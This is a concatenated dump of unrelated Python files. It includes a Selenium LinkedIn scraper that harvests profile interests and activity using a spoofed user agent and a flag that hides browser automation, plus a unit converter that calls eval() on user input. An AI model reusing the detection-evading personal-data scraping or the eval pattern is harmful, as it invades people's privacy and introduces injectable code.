interest_descriptions)]\n elif key == 'Companies':\n interest_names = self.driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n company_links = self.driver.find_elements_by_class_name(\"pv-interest-entity-link.ember-view\")\n self.LinkedIn_Dict['Interests'][key] = [\n {'Name': interest_name.text, 'Industry': link.get_attribute(\"href\")}\n for interest_name, link in zip(interest_names, company_links)]\n # else:\n # interest_names = driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n # LinkedIn_Dict['Interests'][key] = [{'Name': interest_names.text} for interest_names in interest_names]\n 
logging.debug('fetched %d interest categories', i)\n            i += 1\n\n        self.fetch_influencer_info()\n        self.fetch_company_info()\n\n    def fetch_influencer_info(self):\n        if 'Influencers' in self.LinkedIn_Dict['Interests']:\n            for index in range(len(self.LinkedIn_Dict['Interests']['Influencers'])):\n                description = self.LinkedIn_Dict['Interests']['Influencers'][index]['Description']\n                self.driver.get(description)\n                try:\n                    WebDriverWait(self.driver, 3).until(\n                        EC.presence_of_element_located((By.CLASS_NAME, \"pv-about__summary-text.mt4.t-14.ember-view\")))\n                    description = self.driver.find_element_by_class_name(\n                        \"pv-about__summary-text.mt4.t-14.ember-view\").text\n                except:\n                    WebDriverWait(self.driver, 3).until(\n                        EC.presence_of_element_located((By.CLASS_NAME, \"mt1.t-18.t-black.t-normal.break-words\")))\n                    description = self.driver.find_element_by_class_name(\"mt1.t-18.t-black.t-normal.break-words\").text\n\n                self.LinkedIn_Dict['Interests'][\"Influencers\"][index]['Description'] = description\n            logging.info(\"successfully fetched interest influencer infos\")\n\n    def fetch_company_info(self):\n        if 'Companies' in self.LinkedIn_Dict['Interests']:\n            for index in range(len(self.LinkedIn_Dict['Interests']['Companies'])):\n                company_link = self.LinkedIn_Dict['Interests']['Companies'][index]['Industry']\n                self.driver.get(company_link)\n                WebDriverWait(self.driver, 10).until(\n                    EC.presence_of_element_located((By.CLASS_NAME, \"org-top-card-summary-info-list__info-item\")))\n                company_sector = self.driver.find_element_by_class_name(\n                    \"org-top-card-summary-info-list__info-item\").text\n                self.LinkedIn_Dict['Interests'][\"Companies\"][index]['Industry'] = company_sector\n            logging.info(\"successfully fetched interest company infos\")\n\n    def fetch_recent_activities(self):\n        if self.have_recent_activities:\n            self.driver.get(self.profile + '/detail/recent-activity/')\n            WebDriverWait(self.driver, 10).until(\n                EC.presence_of_element_located((By.CLASS_NAME, \"occludable-update.ember-view\")))\n            RAs = self.driver.find_elements_by_class_name(\"occludable-update.ember-view\")\n\n            self.LinkedIn_Dict['Recent Activities'] = [{'Article Author': None,\n                                                        'Author Description': None,\n                                                        'Activity': None} for i in range(min(5, len(RAs)))]\n            for index in range(min(5, len(RAs))):\n                ra = RAs[index]\n                try:\n                    self.LinkedIn_Dict['Recent Activities'][index]['Article Author'] = \\\n                        ra.find_element_by_class_name(\n                            \"feed-shared-actor__name.t-14.t-bold.hoverable-link-text.t-black\").text\n                except:\n                    pass\n\n                try:\n                    description = ra.find_element_by_class_name(\n                        \"feed-shared-actor__description.t-12.t-normal.t-black--light\").text or \\\n                                  ra.find_element_by_class_name(\n                                      \"feed-shared-text-view.white-space-pre-wrap.break-words.ember-view\").text\n                    self.LinkedIn_Dict['Recent Activities'][index]['Author Description'] = \\\n                        description if 'follower' not in description else None\n                except:\n                    pass\n\n                try:\n                    self.LinkedIn_Dict['Recent Activities'][index]['Activity'] = ra.find_element_by_class_name(\n                        \"feed-shared-text-view.white-space-pre-wrap.break-words.ember-view\").text\n                except:\n                    pass\n\n            logging.info('successfully fetched recent activities')\n\n    def login(self, email=None, password=None):\n        self.driver.get(\"https://www.linkedin.com/login\")\n        WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"username\")))\n\n        email_elem = self.driver.find_element_by_id(\"username\")\n        email_elem.send_keys(email)\n\n        password_elem = self.driver.find_element_by_id(\"password\")\n        password_elem.send_keys(password)\n        password_elem.submit()\n\n    
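    # wait for elements that only appear once the login has succeeded\n        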
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"profile-nav-item\")))\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"profile-rail-card__actor-link.t-16.t-black.t-bold\")))\n\n def printProgressBar(self, iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█', printEnd=\"\\r\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end=printEnd)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\ndef linkedin_scrapper(profile_link):\n logging.basicConfig(filename='scrape.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\n options = Options()\n options.add_argument('--headless')\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument(\"window-size=1280,800\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\")\n options.add_argument('--disable-blink-features=AutomationControlled')\n driver = webdriver.Chrome(\"C:\\\\Users\\\\yangc\\\\Desktop\\\\Python\\\\Hack4Good-2021-LinkedIn_Keyword_Extractor\\\\chromedriver.exe\", options=options)\n try:\n cookies = pickle.load(open(\"cookies.pkl\", \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n except:\n pass\n\n logging.info(\"driver setup done\")\n\n scraper = Profile(driver=driver, profile=profile_link)\n\n scraper.scrape()\n return scraper.LinkedIn_Dict\n\n\nif __name__ == \"__main__\":\n linkedin_scrapper(\"xxx\")\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"111631009","text":"# Conversion Function...\n\nimport csv\n\n# ***** Functions go here *****\ndef general_converter(how_much, lookup, dictionary, conversion_factor):\n\n if lookup in dictionary:\n mult_by = dictionary.get(lookup)\n how_much = how_much * float(mult_by) / conversion_factor\n converted = \"yes\"\n else:\n converted = \"no\"\n return [how_much, converted]\n\ndef unit_checker():\n\n unit_tocheck = input(\"Unit? 
\")\n\n # Abbreviation lists\n teaspoon = [\"tsp\", \"teaspoon\", \"t\",\"teaspoons\"]\n tablespoon = [\"tbs\", \"tablespoon\", \"T\", \"tbsp\",\"tablespoons\"]\n cup = [\"c\", \"cup\",\"cups\"]\n ounce = [\"oz\", \"fluid\", \"ounce\", \"fl-pt\",\"ounces\"]\n pint = [\"p\", \"qt\", \"fl\", \"gt\", \"pint\",\"pints\"]\n quart = [\"q\", \"qt\", \"quart\", \"fl-qt\",\"quarts\"]\n pound = [\"lb\", \"#\", \"pound\",\"pounds\"]\n litre = [\"litre\",\"liter\",\"l\",\"litres\",\"liters\"]\n mls = [\"ml\",\"milliliter\",\"millilitre\",\"milliliters\",\"millilitres\"]\n\n if unit_tocheck == \"\":\n return unit_tocheck\n elif unit_tocheck == \"T\" or unit_tocheck.lower() in tablespoon:\n return \"tbs\"\n elif unit_tocheck.lower() in teaspoon:\n return \"tsp\"\n elif unit_tocheck == 'C' or unit_tocheck.lower() in cup:\n return \"cup\"\n elif unit_tocheck.lower() in ounce:\n return \"ounce\"\n elif unit_tocheck.lower() in pint:\n return \"pint\"\n elif unit_tocheck.lower() in quart:\n return \"quart\"\n elif unit_tocheck.lower() in pound:\n return \"pound\"\n else:\n pass\n\nunit_central = {\n \"tsp\": 5,\n \"tbs\": 15,\n \"cup\": 237,\n \"ounce\": 28.35,\n \"pint\": 473,\n \"quart\": 946,\n \"pound\": 454,\n \"litre\": 1000,\n \"ml\": 1\n}\n\ngroceries = open('01_ingredients_ml_to_g.csv')\n\ncsv_groceries = csv.reader(groceries)\n\nfood_dictionary = {}\n\n\nfor row in csv_groceries:\n food_dictionary[row[0]] = row[1]\n\nprint(food_dictionary)\nkeep_going = ''\nif __name__ == '__main__':\n while keep_going =='':\n amount = eval(input('How much? '))\n amount = float(amount)\n\n # Get unit and change it to match dictionary\n unit = unit_checker()\n ingredient = input('Ingredient: ')\n\n # Convert to mls if possible\n amount = general_converter(amount, unit, unit_central, 1)\n print(amount)\n\n # If we converted to mls, try and convert to grams\n if amount[1] == \"yes\":\n amount_2 = general_converter(amount[0], ingredient, food_dictionary, 250)\n\n # if the ingredient is in the list, convert it\n if amount_2[1] == \"yes\":\n print(amount_2)\n\n # if the ingredient is not in the list, leave the unit as ml\n else:\n print(\"unchanged\")\n\n # keep_going = input(\" or q \")\n\n\n\n","sub_path":"08_converter_v2.py","file_name":"08_converter_v2.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"408058366","text":"#与前端相关\nfrom django.conf.urls import url\nfrom haystack.views import SearchView\n\nfrom blog.views import index, archive, article, comment_post, do_logout, do_reg, do_login, category, tag,about,contact\n\nurlpatterns = [\n url(r'^$',index , name = 'index'),\n url(r'^archive/$', archive, name='archive'),\n url(r'^article/$', article, name='article'),\n url(r'^comment/post/$', comment_post, name='comment_post'),\n url(r'^logout$', do_logout, name='logout'),\n url(r'^reg', do_reg, name='reg'),\n url(r'^login', do_login, name='login'),\n url(r'category/$',category,name='category'),\n url(r'tag/$', tag, name='tag'),\n url(r'about/$', about, name='about'),\n url(r'contact/$', contact, name='contact'),\n url(r'^search/$', SearchView(), name='haystack_search'),\n\n]\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161142258","text":"\nfrom sklearn import model_selection\nfrom sklearn import metrics\nfrom sklearn.svm import SVR\nimport numpy as np\nfrom matplotlib 
import pyplot as plt\nimport pandas as pd\nfrom sklearn import ensemble\nimport DataManager as DM\n\nfrom random import seed\nfrom random import random\nfrom random import randrange\n\ndef subsample(X,Y):\n X_new=pd.DataFrame()\n Y_new=pd.DataFrame()\n\n n_sample = len(X)\n for i in range(n_sample):\n index = np.random.randint(0,n_sample)\n X_new=X_new.append(X.iloc[index])\n Y_new=Y_new.append(Y.iloc[index])\n\n return X_new,Y_new\n\n\ndef MAPE(Y_measured,Y_pred):\n abs_diff=np.abs(Y_measured-Y_pred)\n abs_diff.fillna(0,inplace=True)\n #print(Y_measured)\n\n remove_ind=Y_measured==Y_pred\n #print(np.sum(remove_ind))\n for key in Y_measured.columns:\n remove_ind_temp=Y_measured[key]==0\n #remove_ind_temp=remove_ind_temp&Y_measured[key]==0\n remove_ind[key]=remove_ind[key]|remove_ind_temp\n abs_diff=abs_diff[~remove_ind]\n Y_measured = Y_measured[~remove_ind]\n\n sAPE=pd.DataFrame(data=np.where(remove_ind,0,abs_diff/(np.abs(Y_measured))),columns=abs_diff.columns,index=abs_diff.index)\n\n return np.mean(sAPE)*100\n\ndef get_sample_deviation(measured,predicted):\n diff=np.abs(measured-predicted)\n delta=1e-100\n diff.fillna(0, inplace=True)\n\n if False:\n remove_ind = measured == measured\n print(np.sum(remove_ind))\n for key in measured.columns:\n remove_ind_temp = measured[key] == 0\n # remove_ind_temp=remove_ind_temp&Y_measured[key]==0\n remove_ind[key] = remove_ind[key] | remove_ind_temp\n\n #return np.abs(predicted/(measured+1e-10))*100\n return pd.DataFrame(data=np.where(measured==0,0,diff/(measured)*100),columns=diff.columns,index=diff.index)\n\n\ndef get_sample_deviation_flow(measured,predicted):\n diff=measured-predicted\n print(np.mean(diff))\n #diff=diff-np.mean(diff)\n delta=1e-100\n\n #return np.abs(predicted/(measured+1e-10))*100\n #ind_zero=measured==0\n #print(np.sum(ind_zero))\n res=diff/(measured)*100\n #res[ind_zero]=0\n #res.loc[ind_zero] = 0\n\n return res\ndef startswith(col,tag):\n return col.split('_')[0]==tag\ndef remove_zero_measurements(X,Y,cols):\n\n for col in cols:\n if not (startswith(col,'GJOA') or startswith(col,'Total')):\n ind_zero_mes=Y[col]==0\n ind_not_zero_chk=X[col.split('_')[0] + '_CHK'] != 0\n X=X[~(ind_zero_mes&ind_not_zero_chk)]\n Y=Y[~(ind_zero_mes&ind_not_zero_chk)]\n return X,Y\ndef get_predicted_and_measured_df(model,data,X,Y):\n cols = model.output_tag_ordered_list\n\n measured = pd.DataFrame(data=data.inverse_transform(Y, 'Y'), columns=cols)\n\n predicted = data.inverse_transform(model.predict(X), 'Y')\n predicted = pd.DataFrame(data=predicted, columns=cols)\n predicted = predicted.set_index(Y.index)\n return measured,predicted\ndef get_choke_diff_deviation(model,data,X,Y):\n cols = model.output_tag_ordered_list\n choke_delta_range=np.arange(10, 100, 10)\n\n deviation_points=pd.Series()\n X_transformed=data.inverse_transform(X,'X')\n\n measured, predicted = get_predicted_and_measured_df(model, data, X, Y)\n\n for delta in choke_delta_range:\n ind=None\n for col in cols:\n name=col.split('_')[0]\n if ind is None:\n ind_temp1=X_transformed[name+'_delta_CHK']>=(delta-10)\n ind_temp2=X_transformed[name+'_delta_CHK']<=delta\n ind=ind_temp1&ind_temp2\n else:\n ind_temp1 = X_transformed[name + '_delta_CHK'] >= (delta - 10)\n ind_temp2 = X_transformed[name + '_delta_CHK'] <= delta\n ind_temp = ind_temp1&ind_temp2\n ind=ind|ind_temp\n #print(np.sum(ind))\n deviation=get_sample_deviation(measured,predicted)\n\n\n #deviation.fillna(0, inplace=True)\n\n #print(deviation)\n #exit()\n #print(delta)\n 
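# record the mean B1_PDC deviation for this choke-delta bucket\n        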
deviation_points[str(delta-10)+'-'+str(delta)]=deviation['B1_PDC'].mean()\n    count, division = np.histogram(deviation_points)\n    deviation_points.hist(bins=division)\n    plt.show()\ndef get_chk_zero_ind(data,col):\n    name=col.split('_')[0]\n    return data[name+'_CHK']==0\ndef get_cumulative_deviation(model,data,X,Y,do_remove_zeros=True):\n\n    cols = model.output_tag_ordered_list\n    deviation_range = np.arange(0, 100, 0.5)\n\n    measured, predicted=get_predicted_and_measured_df(model,data,X,Y)\n\n    deviation_points = get_sample_deviation(measured, predicted)\n    #deviation_points.fillna(0,inplace=True)\n\n\n\n    if do_remove_zeros:\n        for col in cols:\n            if col.split('_')[0] not in ['GJOA','Total']:\n                ind=get_chk_zero_ind(data.inverse_transform(X,'X'),col)\n                print(np.sum(ind))\n                deviation_points.loc[ind,col]=0\n\n\n\n    cumulative_deviation=pd.DataFrame(data=np.zeros((len(deviation_range),len(cols))),columns=cols)\n    cumulative_deviation=cumulative_deviation.set_index(deviation_range)\n    cumulative_deviation.index.name=None\n\n    N = len(deviation_points)\n    for col in cols:\n        for percentage in deviation_range:\n            cumulative_deviation[col][percentage]=np.sum(deviation_points[col]<=percentage)/N*100\n\n\n    #print(deviation_points)\n    #for i in deviation_points.index.values:\n    #    print(deviation_points['B1_QGAS'].loc[[i]])\n    return cumulative_deviation\n\n\ndef get_absolute_deviation(model,data,X,Y):\n    cols = model.output_tag_ordered_list\n    #deviation_range = np.arange(0, 50, 1)\n\n    measured, predicted = get_predicted_and_measured_df(model, data, X, Y)\n\n    deviation_points = get_sample_deviation(measured, predicted)\n    deviation_points.fillna(0, inplace=True)\n    for key in cols:\n        if key.split('_')[0] not in ['GJOA','Total']:\n            chk_col=key.split('_')[0]+'_CHK'\n            ind_zero=data.inverse_transform(X,'X')[chk_col]<5\n            deviation_points.loc[ind_zero, key] = 0\n\n    return deviation_points\n\ndef count_number_of_samples_below_cum_devation(thresh,cumulative_error,tag):\n    return cumulative_error.sum(axis=1)[tag][thresh]\n\n\ndef train_test_split(X,Y,test_size):\n    split_length=int(len(X)*(1-test_size))\n    X_train,X_test=X[0:split_length],X[split_length-1:-1]\n    Y_train,Y_test=Y[0:split_length],Y[split_length-1:-1]\n    return X_train,X_test,Y_train,Y_test\n\ndef get_train_test_val_data(X,Y,test_size,val_size):\n    #X = Data.X_transformed\n    #Y = Data.Y_transformed\n\n    #X=X.reshape(1,X.shape[0],X.shape[1])\n    #Y = Y.reshape(1, Y.shape[0], Y.shape[1])\n    # X, Y = remove_chk_zeros(X, Y, 'B2')\n    X, X_test, Y, Y_test = train_test_split(X, Y, test_size=test_size)\n    X_train, X_val, Y_train, Y_val = train_test_split(X, Y, test_size=val_size)\n\n    return X_train,Y_train,X_val,Y_val,X_test,Y_test\ndef split_data(X,Y,split_size):\n\n    X_start, X_end, Y_start, Y_end = train_test_split(X, Y, test_size=split_size)\n\n\n    return X_start,Y_start,X_end,Y_end\n\n\n\n\ndef evaluate_model2(model,data,X_train,X_test,Y_train,Y_test):\n    score_train_MSE, score_test_MSE, score_train_r2, score_test_r2, cols = model.evaluate(data, X_train, X_test,Y_train, Y_test)\n\n    return print_scores(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols),scores_to_latex(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols)\ndef print_scores(data,Y_train,Y_test,score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols):\n\n    # Slow and bad code, fix this!!!!!!!!!\n    n_empty_space=30\n    def print_empty_space(s,n):\n        s+=' '*n\n        return s\n    def 
scores_to_tabbed_string(s,scores_train,score_test,cols,Y=[]):\n        for i,col in zip(range(len(cols)),cols):\n            s_temp='{0}: {1:0.2f}'.format(col,scores_train[i])\n            s_len=len(s_temp)\n            s_temp=print_empty_space(s_temp,n_empty_space-s_len)\n            s_temp =''.join((s_temp,'{0}: {1:0.2f}'.format( col,score_test[i])))\n            if len(Y)>0:\n                Y_MEAN=np.mean(Y[col][Y[col]>0])\n                s_temp = print_empty_space(s_temp, 2*n_empty_space - len(s_temp))\n                s_temp=''.join((s_temp,'{0}: {1:0.2f}%'.format(col,score_test[i]/Y_MEAN*100)))\n                s_temp = print_empty_space(s_temp, 3 * n_empty_space - len(s_temp)+10)\n                s_temp =''.join((s_temp, '{0}: {1:0.2f}'.format(col, Y_MEAN)))\n            s_temp=''.join((s_temp,'\\n'))\n            s=''.join((s,s_temp))\n        return s\n\n\n\n    s=' #### Scores #### \\n'\n    s=''.join((s,'RMSE TRAIN:'))\n    s=print_empty_space(s,n_empty_space-len('RMSE TRAIN:'))\n    s=''.join((s,'RMSE VAL:'))\n    s = print_empty_space(s, n_empty_space - len('RMSE VAL:'))\n    s=''.join((s,'Percentage error (VAL/MEAN)*100'))\n    s = print_empty_space(s, 10+n_empty_space - len('Percentage error (VAL/MEAN)*100'))\n    s = ''.join((s,'MEAN'))\n    s=''.join((s,'\\n'))\n    s+='------------------------------------------------------------------------------------------------------------------------\\n'\n    s=scores_to_tabbed_string(s,np.sqrt(score_train_MSE),np.sqrt(score_test_MSE),cols,data.inverse_transform(Y_test,'Y'))\n    s += '-------------------------------------------------------\\n'\n    s += 'R2 TRAIN:'\n    s = print_empty_space(s, n_empty_space-len('R2 TRAIN:'))\n    s += 'R2 VAL: \\n'\n    s += '-------------------------------------------------------\\n'\n    s = scores_to_tabbed_string(s, score_train_r2,score_test_r2, cols)\n    s += '-------------------------------------------------------\\n'\n    s+='#### ------ #### \\n'\n    return s\n\n\ndef remove_chk_zeros(X,Y,well):\n\n    #X_cols=[well+'_PDC',well+'_CHK']\n    #Y_cols=[well+'_PWH']\n\n    #Y=Y[Y_cols]\n    #X=X[X_cols]\n\n    ind=X[well+'_CHK']<0.05\n    Y=Y[~ind]\n    X=X[~ind]\n    return X,Y\ndef save_to_file(filename,str):\n    PATH = '/Users/UAC/GITFOLDERS/MasterThesisCode/Models/NeuralNetworks/'\n    PATH='C:/users/ugurac/Documents/GITFOLDERS/MasterThesisCode/Models/NeuralNetworks/'\n    f = open(PATH + filename + '_config', 'w')\n    f.write(str)\n    f.close()\n\ndef scores_to_latex(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2, cols):\n\n    # Slow and bad code, fix this!!!!!!!!!\n    n_empty_space = 30\n\n    def print_empty_space(s, n):\n        s += ' ' * (n-1)\n        s+='&'\n        return s\n\n    def scores_to_tabbed_string(s, scores_train, score_test, cols, Y=[]):\n        for i, col in zip(range(len(cols)), cols):\n            #col=col.replace('_','_')\n            s_temp = '{0}& {1:0.2f}'.format(col.replace('_','\\_'), scores_train[i])\n            s_len = len(s_temp)\n            s_temp = print_empty_space(s_temp, n_empty_space - s_len)\n            s_temp = ''.join((s_temp, '{0:0.2f}'.format(score_test[i])))\n            if len(Y) > 0:\n                Y_MEAN = np.mean(Y[col][Y[col] > 0])\n                s_temp = print_empty_space(s_temp, 2 * n_empty_space - len(s_temp))\n                s_temp = ''.join((s_temp, '{0:0.2f}\\%'.format(score_test[i] / Y_MEAN * 100)))\n                s_temp = print_empty_space(s_temp, 3 * n_empty_space - len(s_temp) + 10)\n                s_temp = ''.join((s_temp, '{0:0.2f}'.format(Y_MEAN)))\n            s_temp = ''.join((s_temp, '\\\\\\ \\n'))\n            s = ''.join((s, s_temp))\n        return s\n\n    #s = ' #### Scores #### \\\\\\ \\n'\n    s='\\hline \\n'\n    s = ''.join((s, 'Tag&RMSE TRAIN:'))\n\n    s = print_empty_space(s, n_empty_space - len('RMSE TRAIN:'))\n    s = ''.join((s, 'RMSE VAL:'))\n    s = print_empty_space(s, n_empty_space - len('RMSE VAL:'))\n    s = ''.join((s, 
'Percentage error (VAL/MEAN)*100'))\n s = print_empty_space(s, 10 + n_empty_space - len('Percentage error (VAL/MEAN)*100'))\n s = ''.join((s, 'MEAN'))\n s+='\\\\\\\\'\n s += '\\n \\hline \\n '\n #s = ''.join((s, '\\\\\\ \\n'))\n #s += '------------------------------------------------------------------------------------------------------------------------\\\\\\ \\n'\n s = scores_to_tabbed_string(s, np.sqrt(score_train_MSE), np.sqrt(score_test_MSE), cols,\n data.inverse_transform(pd.concat([Y_train, Y_test], axis=0),'Y'))\n #s += '-------------------------------------------------------\\\\\\ \\n'\n s += '\\n \\hline \\n '\n s += 'Tag&R2 TRAIN:'\n s = print_empty_space(s, n_empty_space - len('R2 TRAIN:'))\n s += 'R2 VAL:&\\\\\\ '\n s += '\\n \\hline \\n '\n #s += '-------------------------------------------------------\\\\\\ \\n'\n s = scores_to_tabbed_string(s, score_train_r2, score_test_r2, cols)\n s += '\\n \\hline \\n '\n #s += '-------------------------------------------------------\\\\\\ \\n'\n #s += '#### ------ #### \\\\\\ \\n'\n return s\n\ndef evaluate_model(model,data,X_train,X_test,Y_train,Y_test):\n\n cols=model.output_tag_ordered_list\n\n scores={}\n\n y_true_test=data.inverse_transform(Y_test,'Y')[cols]\n y_pred_test=data.inverse_transform(model.predict(X_test),'Y')\n y_pred_test=y_pred_test.set_index(y_true_test.index)\n y_true_train = data.inverse_transform(Y_train, 'Y')[cols]\n y_pred_train = data.inverse_transform(model.predict(X_train), 'Y')\n y_pred_train = y_pred_train.set_index(y_true_train.index)\n\n\n score_test_RMSE = np.sqrt(metrics.mean_squared_error(y_true_test,y_pred_test, multioutput='raw_values'))\n score_train_RMSE = np.sqrt(metrics.mean_squared_error(y_true_train, y_pred_train, multioutput='raw_values'))\n\n score_test_r2 = metrics.r2_score(y_true_test, y_pred_test, multioutput='raw_values')\n score_train_r2 = metrics.r2_score(y_true_train, y_pred_train, multioutput='raw_values')\n\n score_train_mape=MAPE(y_true_train,y_pred_train)\n score_test_mape = MAPE(y_true_test, y_pred_test)\n\n scores['RMSE_train']=pd.Series(data=score_train_RMSE, index=cols)\n scores['RMSE_test']= pd.Series(data=score_test_RMSE, index=cols)\n\n scores['R2_train']= pd.Series(data=score_train_r2, index=cols)\n scores['R2_test'] = pd.Series(data=score_test_r2, index=cols)\n\n scores['MAPE_train'] = pd.Series(data=score_train_mape, index=cols)\n scores['MAPE_test'] = pd.Series(data=score_test_mape, index=cols)\n\n\n return scores\n","sub_path":"model_validation/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326605502","text":"from components.climb import Lift\nfrom magicbot import StateMachine, state, timed_state\n\n\nclass ClimbAutomation(StateMachine):\n\n front_lift: Lift\n back_lift: Lift\n\n @state(must_finish=True)\n def both_lifts_down(self):\n self.front_lift.extend_lift()\n self.back_lift.extend_lift()\n if (\n self.front_lift.get_lift_at_set_pos()\n and self.back_lift.get_lift_at_set_pos()\n ):\n self.next_state_now(\"drive_forward\")\n\n @state(must_finish=True)\n def drive_forward(self):\n self.front_lift.move_wheels_forward()\n self.back_lift.move_wheels_forward()\n\n if self.front_lift.is_touching_podium():\n self.next_state_now(\"front_lift_up\")\n\n @state(must_finish=True)\n def front_lift_up(self):\n self.front_lift.retract_lift()\n if self.front_lift.get_lift_at_set_pos():\n self.next_state_now(\"going_forward\")\n\n 
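# front lift is clear of the podium; drive on until the back lift reaches it\n    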
@state(must_finish=True)\n    def going_forward(self):\n        self.back_lift.move_wheels_forward()\n        if self.back_lift.is_touching_podium():\n            self.next_state_now(\"back_lift_up\")\n\n    @state(must_finish=True)\n    def back_lift_up(self):\n        self.back_lift.retract_lift()\n        if self.back_lift.get_lift_at_set_pos():\n            self.done()\n","sub_path":"automations/climb.py","file_name":"climb.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156298362","text":"#!/usr/bin/python3\n\"\"\"13-student module\"\"\"\n\n\nclass Student:\n    \"\"\"Student class\"\"\"\n    def __init__(self, first_name, last_name, age):\n        \"\"\"init magic method\"\"\"\n        if not isinstance(first_name, str):\n            raise TypeError('first_name is of the wrong type')\n        elif not isinstance(last_name, str):\n            raise TypeError('last_name is of the wrong type')\n        if type(age) != int:\n            raise TypeError('age is of the wrong type')\n        else:\n            self.first_name = first_name\n            self.last_name = last_name\n            self.age = age\n\n    def to_json(self, attrs=None):\n        \"\"\"to_json method\"\"\"\n        retd = self.__dict__\n        if type(attrs) == list:\n            if not all(type(x) == str for x in attrs):\n                return retd\n            return {i: retd[i] for i in attrs if i in retd.keys()}\n        else:\n            return retd\n\n    def reload_from_json(self, json):\n        \"\"\"reload_from_json\"\"\"\n        if '__dict__' in dir(self) and len(json) > 0:\n            self.__dict__ = json\n","sub_path":"0x0B-python-input_output/13-student.py","file_name":"13-student.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172926835","text":"# https://riptutorial.com/gtk3/example/24777/embed-a-video-in-a-gtk-window-in-python3\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('Gst', '1.0')\nfrom gi.repository import Gtk, Gst # ,GObject\nfrom view import myView\nfrom model import myModel\n\n\nGst.init(None)\nGst.init_check(None)\n\n\nclass myController(object):\n    def __init__(self, view, model):\n        self._view = view\n        self._model = model\n        self._view.connect('button-addChannel-clicked', self._addVideo)\n        self._view.connect('button-startChannel-clicked', self._startVideo)\n        self._view.connect('button-stopChannel-clicked', self._stopVideo)\n        self._view.connect('combobox-input-changed', self._inputChanged)\n        # self._view.connect('destroy', self.on_destroy)\n        self._view.connect('button-addClient-clicked', self._addClient)\n\n    def on_destroy(self, win):\n        # print(\"bye bye\")\n        Gtk.main_quit()\n\n    def _addVideo(self, button):\n        print(\"add video\")\n        # model\n        channelNum = self._model._createChannel()\n        print(f\"channel {channelNum} created\")\n        # self._channels.append(channel)\n        # pass sink to view\n        _gtksink = self._model._getGtksink(channelNum) # TODO remove + dependent\n        self._view._addVideoView(channelNum)\n        # self._view._setVideoView(gtksink, channelNum)\n\n\n\n    def _startVideo(self, button, channelNum):\n        print(\"starting video\", channelNum)\n        # channel = self._channels[arg]\n        # channel._stop()\n        self._model._play(channelNum)\n\n    def _stopVideo(self, button, channelNum):\n        print(\"stopping video\", channelNum)\n        # channel = self._channels[arg]\n        self._model._stop(channelNum)\n        # channel._play()\n\n    def _inputChanged(self, combo, channelNum, inputType):\n        print(\"input changed\")\n        # print(combo)\n        print(\"channel\", channelNum)\n        print(\"input\", inputType)\n\n        # Model - create channel\n        
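# tell the model which input source this channel should use\n        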
self._model._setInput(channelNum, inputType)\n\n        # pass sink to view\n        _gtksink = self._model._getGtksink(channelNum)\n        # self._view._addVideoView(_gtksink)\n\n        self._view._setVideoView(_gtksink, channelNum)\n\n    def _addClient(self, button, channelNum, ip, port):\n        print(f\"controller: channel {channelNum} add client\", ip, port)\n        self._model._addClient(channelNum, ip, port)\n\n\n\n\nif __name__ == \"__main__\":\n    # window = Gtk.ApplicationWindow()\n\n    view = myView()\n    model = myModel()\n\n    # vbox = Gtk.VBox()\n\n    # window\n    # window.add(vbox)\n\n    # model\n    controller = myController(view, model)\n\n    # Create a gstreamer pipeline with no sink. \n    # A sink will be created inside the GstWidget.\n    # widget = GstWidget('videotestsrc')\n    # widget.set_size_request(200, 200)\n\n    # vbox.add(widget)\n    # button = Gtk.Button(\"Start\")\n    # button.connect(\"clicked\", controller.addVideo)\n    # vbox.add(button)\n\n    # window.show_all()\n\n    Gtk.main()\n","sub_path":"server/gstreamer/python/app6/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108021681","text":"# -*- coding: utf-8 -*-\nfrom __future__ 